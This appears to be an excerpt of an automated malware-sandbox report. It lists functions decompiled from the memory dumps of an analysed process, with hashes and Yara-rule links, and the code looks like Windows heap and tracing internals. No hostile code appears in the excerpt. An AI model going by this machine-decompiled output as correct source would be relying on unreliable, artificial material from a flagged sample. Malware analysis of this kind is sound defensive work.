0x019edb96
0x019edb98
0x019edb98
0x019edb8b
0x019edb7a
0x019edb9d
0x019edba2

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: afda70a5226f09234e9a31bff6f69977b312a14f5565b7954f7bdd7c5485b494
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: EFF0FC332415239BEB335AD9C888F27B6D98FD1A60F1D0435F20D9B344DA708C0286D1

Uniqueness

Uniqueness Score: -1.00%

Function 019EB1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E019EB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E01A07D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E01A07D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E01A67016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x019eb1e8
0x019eb1ea
0x019eb1f3
0x01a44a17
0x019eb1f9
0x019eb1f9
0x019eb1f9
0x019eb201
0x01a44a21
0x01a44a2e
0x00000000
0x00000000
0x01a44a3b
0x01a44a4d
0x01a44a3d
0x01a44a46
0x01a44a46
0x01a44a55
0x00000000
0x00000000
0x00000000
0x019eb20a
0x019eb20a
0x019eb20a
0x019eb20a

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 76a64faeeffa2cc935991fe3046743766082091155d7a6813c81e87f975e48d6
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 2C01D132200680EBE723979DC908F69BBD8EF95754F0900B1FA198B7B2D678D800C624

Uniqueness

Uniqueness Score: -1.00%

Function 01A7FE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E01A7FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x1add360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E01A07D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E01A2B640(E01A29AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x01a7fe96
0x01a7fe9e
0x01a7fea1
0x01a7fead
0x01a7feb3
0x01a7feb9
0x01a7fec3
0x01a7fed5
0x01a7fec5
0x01a7fece
0x01a7fece
0x01a7fee0
0x01a7fee1
0x01a7fee3
0x01a7fee8
0x01a7fefb

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b574cd0bb3dd19a8014350aadaf9b4a60811efff9c1dbf108ff2d3ed98b3380d
Instruction ID: 62e7c6486501562e6362e3a9242fbf4c1d1b3670ae0ee40847120a0823f471ef
Opcode Fuzzy Hash: b574cd0bb3dd19a8014350aadaf9b4a60811efff9c1dbf108ff2d3ed98b3380d
Instruction Fuzzy Hash: 47016270A01219AFCB14DFA8D542A6EB7F4EF04704F144569E955DB382DA35EA02CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01AA131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E01AA131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x1add360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E01A07D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E01A2B640(E01A29AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x01aa131b
0x01aa132a
0x01aa1330
0x01aa1336
0x01aa133e
0x01aa1341
0x01aa1344
0x01aa134f
0x01aa1361
0x01aa1351
0x01aa135a
0x01aa135a
0x01aa136c
0x01aa136d
0x01aa136f
0x01aa1374
0x01aa1387

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b15affb2a1fe5e3c694f66cb8fc12fc13aa6a81646e0e7ae12cd95baae0164d
Instruction ID: 160ae916fed67e491ad20bc9033e0c49f7ad34bfa1cf7328029752d48920e4af
Opcode Fuzzy Hash: 0b15affb2a1fe5e3c694f66cb8fc12fc13aa6a81646e0e7ae12cd95baae0164d
Instruction Fuzzy Hash: 59013C71A01219AFCB54EFA9D645AAEB7F4FF18700F404069FD55EB381EA34AA00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 01AB8F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E01AB8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x1add360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E01A07D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E01A2B640(E01A29AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x01ab8f6a
0x01ab8f79
0x01ab8f81
0x01ab8f84
0x01ab8f8b
0x01ab8f91
0x01ab8f94
0x01ab8f9e
0x01ab8fb0
0x01ab8fa0
0x01ab8fa9
0x01ab8fa9
0x01ab8fbb
0x01ab8fbc
0x01ab8fbe
0x01ab8fc3
0x01ab8fd6

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec825561ee4699bc06e5111e12b05c2d4b4c23256050915643ad4d4746b641ae
Instruction ID: 0dc9250e0fbc7c3797b2556f57cc7bfeaa7dc7576242d42adeddacdb04d93175
Opcode Fuzzy Hash: ec825561ee4699bc06e5111e12b05c2d4b4c23256050915643ad4d4746b641ae
Instruction Fuzzy Hash: 27013174A01259AFDB10DFB8D545AAEB7B8EF18300F104059F945EB381EA34DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3AF, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15378f1b3c5ddb601b0bb99a50fb5f2807ce416a97f60a128b6f92495a49721c
Instruction ID: bd14574ee4fed947a57e8e44ce9e963412fae76feab962b3f39e2e797e60efab
Opcode Fuzzy Hash: 15378f1b3c5ddb601b0bb99a50fb5f2807ce416a97f60a128b6f92495a49721c
Instruction Fuzzy Hash: A2F02733A161598BC3158F75EC822B8F3B0EF56744B2515ECD8489B110D332C416CB44

Uniqueness

Uniqueness Score: -1.00%

Function 01A0C577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01A0C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E01A0C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x19c11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E01AB88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x01a0c577
0x01a0c57d
0x01a0c581
0x01a0c5b5
0x01a0c5b9
0x01a0c5ce
0x01a0c5ce
0x01a0c5ca
0x00000000
0x01a0c5ca
0x01a0c5c4
0x01a0c5c8
0x00000000
0x00000000
0x00000000
0x01a0c5ad
0x00000000
0x01a0c5af

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2f8fdfb45abd3daf069faaa0a438fdcb9a06df473e31178100ba53295bcc712
Instruction ID: 33013208b87ca0cc52a24f0215cef64640b55dc65473d3d81ebfb0ce88aa1ce6
Opcode Fuzzy Hash: d2f8fdfb45abd3daf069faaa0a438fdcb9a06df473e31178100ba53295bcc712
Instruction Fuzzy Hash: B1F024BA8912908FE733C33CE084B227FE89B04770F4846E7D405831CBD2A6F880C240

Uniqueness

Uniqueness Score: -1.00%

Function 01AB8D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E01AB8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x1add360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E01A07D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E01A2B640(E01A29AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x01ab8d34
0x01ab8d43
0x01ab8d4b
0x01ab8d4e
0x01ab8d52
0x01ab8d5c
0x01ab8d6e
0x01ab8d5e
0x01ab8d67
0x01ab8d67
0x01ab8d79
0x01ab8d7a
0x01ab8d7c
0x01ab8d81
0x01ab8d94

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63ab02b00e1a70c1bfaf9035e1f478985d345ec57d960626d69ad8a4a6ab8262
Instruction ID: 2ad3b7e2b0e63b16daf6e3e6e05989029995edb97c566fca5a588d7cc7bc3856
Opcode Fuzzy Hash: 63ab02b00e1a70c1bfaf9035e1f478985d345ec57d960626d69ad8a4a6ab8262
Instruction Fuzzy Hash: 69F0B470E046589FDB14EFBCD541AAE77B8EF14700F108099E905EB281EA34D904CB54

Uniqueness

Uniqueness Score: -1.00%

Function 01AA2073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E01AA2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E01A9FD22(__ecx);
				_t19 =  *0x1ad849c - _t3; // 0x9880945
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1ad8748; // 0x0
					if(__eflags <= 0) {
						E01AA1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1ad8724 & 0x00000004;
							if(( *0x1ad8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1ad8724; // 0x0
					return E01A98DF1(__ebx, 0xc0000374, 0x1ad5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x01aa2076
0x01aa2078
0x01aa207d
0x01aa2083
0x01aa20a4
0x01aa20aa
0x01aa20ac
0x01aa20b7
0x01aa20ba
0x01aa20bc
0x01aa20c9
0x01aa20c9
0x01aa20d0
0x01aa20d2
0x00000000
0x01aa20d2
0x01aa20be
0x01aa20c3
0x01aa20c5
0x01aa20c7
0x00000000
0x00000000
0x01aa20c7
0x01aa20bc
0x01aa20d4
0x01aa2085
0x01aa2085
0x01aa20a3
0x01aa20a3

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfb589296b81e6547b8428205d8acf2cb4ed98b6cd9bda596a9697dd8eaae6b3
Instruction ID: 73490c66a32683e816712cbe67c74dc0bc5d9d742c832bfa71fdf52c1cfceb46
Opcode Fuzzy Hash: bfb589296b81e6547b8428205d8acf2cb4ed98b6cd9bda596a9697dd8eaae6b3
Instruction Fuzzy Hash: E7F0EC6E5565D54ADF336F2C72017E13FD1D756220F8A0447D45157205C73C8CA3CB10

Uniqueness

Uniqueness Score: -1.00%

Function 01A2927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E01A2927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L01A04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E01A2FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E01A292C6(_t11, _t14);
				}
				return _t11;
			}

0x01a29295
0x01a29299
0x01a2929f
0x01a292aa
0x01a292ad
0x01a292ae
0x01a292af
0x01a292b0
0x01a292b4
0x01a292bb
0x01a292bb
0x01a292c5

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: b67457581f564cd38d4ba8493b21f69356fd3ed26a622fb67337b0925b6164cd
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 90E0ED32240A116BEB219E0ADD80B0376A9AF92B24F014078FA001E282CAF6D80887A0

Uniqueness

Uniqueness Score: -1.00%

Function 01AB8CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E01AB8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x1add360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E01A07D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E01A2B640(E01A29AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x01ab8ce5
0x01ab8ced
0x01ab8cf0
0x01ab8cfb
0x01ab8d0d
0x01ab8cfd
0x01ab8d06
0x01ab8d06
0x01ab8d18
0x01ab8d19
0x01ab8d1b
0x01ab8d20
0x01ab8d33

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be1dbc76908c8e5a48881c330ad30c281bddca5cae320bf183b8d7af3c1f58fe
Instruction ID: 591a7e5c32e374cdb232d66aa2e1cae0d022450690f5b67e344cbc658f4f0b9d
Opcode Fuzzy Hash: be1dbc76908c8e5a48881c330ad30c281bddca5cae320bf183b8d7af3c1f58fe
Instruction Fuzzy Hash: B2F0E270A04259AFCB00EBACE946EAE77B8EF18300F10019AE912EB2C1EA34D904C754

Uniqueness

Uniqueness Score: -1.00%

Function 01A0746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E01A0746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E019FEB70(__ecx, 0x1ad79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E01A295D0();
							L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x01a0746d
0x01a0746d
0x01a0746d
0x01a07471
0x01a07488
0x01a4f92d
0x01a0748e
0x01a07491
0x01a07495
0x01a4f937
0x01a4f93a
0x01a4f94e
0x01a4f953
0x01a4f956
0x01a4f956
0x01a07495
0x00000000
0x01a07488
0x01a07473
0x01a07478
0x01a0747d
0x01a07481
0x00000000
0x01a07481
0x01a0747d
0x01a0747a
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a4ce45c09dee4bd93a703915825c6b012c0df6d76c3855761d469efad3db79b
Instruction ID: 38e0e6838a05e031f78b6cea44c29140294e5df8bf1a55b0d3864b3d5b2fa466
Opcode Fuzzy Hash: 1a4ce45c09dee4bd93a703915825c6b012c0df6d76c3855761d469efad3db79b
Instruction Fuzzy Hash: 11F0B434500145AADF039BECD580B797F71AF04354F0A4115D9D1A71E3E736A800C795

Uniqueness

Uniqueness Score: -1.00%

Function 019E4F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E019E4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E01AB88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E01A0C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x19c1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x019e4f2e
0x019e4f34
0x019e4f38
0x01a40b85
0x01a40b85
0x01a40b89
0x01a40b9a
0x01a40b9a
0x01a40b9f
0x00000000
0x01a40b9f
0x01a40b94
0x01a40b98
0x00000000
0x00000000
0x00000000
0x01a40b98
0x019e4f3e
0x019e4f48
0x00000000
0x019e4f6e
0x00000000
0x019e4f70

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1626249613542bfa950ada7ee41d7f64639f697074aeb526c294c21e46446a0c
Instruction ID: ed1fbc346803a4f0873b034cb8071dacd2144fd190ecfba242eb6894edd8dcb9
Opcode Fuzzy Hash: 1626249613542bfa950ada7ee41d7f64639f697074aeb526c294c21e46446a0c
Instruction Fuzzy Hash: 1BF0E2325216848FD772EB2CC384BA3B7D8AB44BB8F448874E60587922C728EC41D648

Uniqueness

Uniqueness Score: -1.00%

Function 01AB8B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E01AB8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x1add360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E01A07D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E01A2B640(E01A29AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x01ab8b67
0x01ab8b6f
0x01ab8b72
0x01ab8b7d
0x01ab8b8f
0x01ab8b7f
0x01ab8b88
0x01ab8b88
0x01ab8b9a
0x01ab8b9b
0x01ab8b9d
0x01ab8ba2
0x01ab8bb5

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f4e1edc825e79e3aa03c4da673bf83f5229ad7f51bbd36fa0c7355c1ee61d9e
Instruction ID: 095ba60b681d64deb3430d00100b5d965fdfde0e525c2898d3c285935b3b076f
Opcode Fuzzy Hash: 8f4e1edc825e79e3aa03c4da673bf83f5229ad7f51bbd36fa0c7355c1ee61d9e
Instruction Fuzzy Hash: 41F082B0A04259ABDB14EBBCDA46EAE77B8EF04700F040459FA05DB3C1EA34D900C794

Uniqueness

Uniqueness Score: -1.00%

Function 01A1A44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01A1A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x1ad7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L01A04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E01A2FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x01a1a44b
0x01a1a453
0x01a1a472
0x01a1a476
0x00000000
0x01a1a493
0x01a1a47a
0x01a1a47f
0x01a1a486
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0288e95e9bfa02204616353f743a7fe151ad3c1d3e5be93265c64c2af7cb0698
Instruction ID: 85e9f0ec8b9c0f01e1e4a51f9d01636b09caa1d603ab688de0ac552ce86a25ea
Opcode Fuzzy Hash: 0288e95e9bfa02204616353f743a7fe151ad3c1d3e5be93265c64c2af7cb0698
Instruction Fuzzy Hash: 76E0D872A42821ABD3225F58FC00F67B3AEEBE8A51F098035F605C7254D628DD02C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 019EF358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E019EF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E01A1F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L01A04620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x019ef35d
0x019ef361
0x019ef367
0x019ef372
0x019ef38c
0x019ef38c
0x019ef394

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: ee2c8c5afca313f50d5b9ebe4da4aa93a8c16073d2b28e2d209572c2ce3cb1ea
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: E3E0D832A41158FBDB2296D9DE05F5AFFACDB58BA1F000196BA08D7190D5609D00C2D0

Uniqueness

Uniqueness Score: -1.00%

Function 019FFF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E019FFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x19c11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E01AB88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E01A00050(_t14);
				}
			}

0x019fff66
0x019fff6b
0x00000000
0x019fff8f
0x00000000
0x019fff8f

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 855421ccdbafa635f808076f69aefa6c1cfe1e9dc5582713377ea0e0a6c09caf
Instruction ID: cf367310cffa4ee9cfdd9dfcd707f13600475aa3c2205cf64098fba228e9e747
Opcode Fuzzy Hash: 855421ccdbafa635f808076f69aefa6c1cfe1e9dc5582713377ea0e0a6c09caf
Instruction Fuzzy Hash: 0DE0DFB2605244EFD736DF5AEA80F257BACAB52722F19841DE20C4B102C625D880C38A

Uniqueness

Uniqueness Score: -1.00%

Function 01A741E8, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E01A741E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x1ac08f0);
				_t5 = E01A3D08C(__ebx, __edi, __esi);
				if( *0x1ad87ec == 0) {
					E019FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x1ad87ec == 0) {
						 *0x1ad87f0 = 0x1ad87ec;
						 *0x1ad87ec = 0x1ad87ec;
						 *0x1ad87e8 = 0x1ad87e4;
						 *0x1ad87e4 = 0x1ad87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L01A74248();
				}
				return E01A3D0D1(_t5);
			}

0x01a741e8
0x01a741ea
0x01a741ef
0x01a741fb
0x01a74206
0x01a7420b
0x01a74216
0x01a7421d
0x01a74222
0x01a7422c
0x01a74231
0x01a74231
0x01a74236
0x01a7423d
0x01a7423d
0x01a74247

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e965b12fb24f9f1bef9dbac512472d947ca9094aed458ed1cdf0958a7a979f37
Instruction ID: aae99da8dfbab98a7bde325ab189bea6999a4bf26cc08b9b3232c1a5c11d13d5
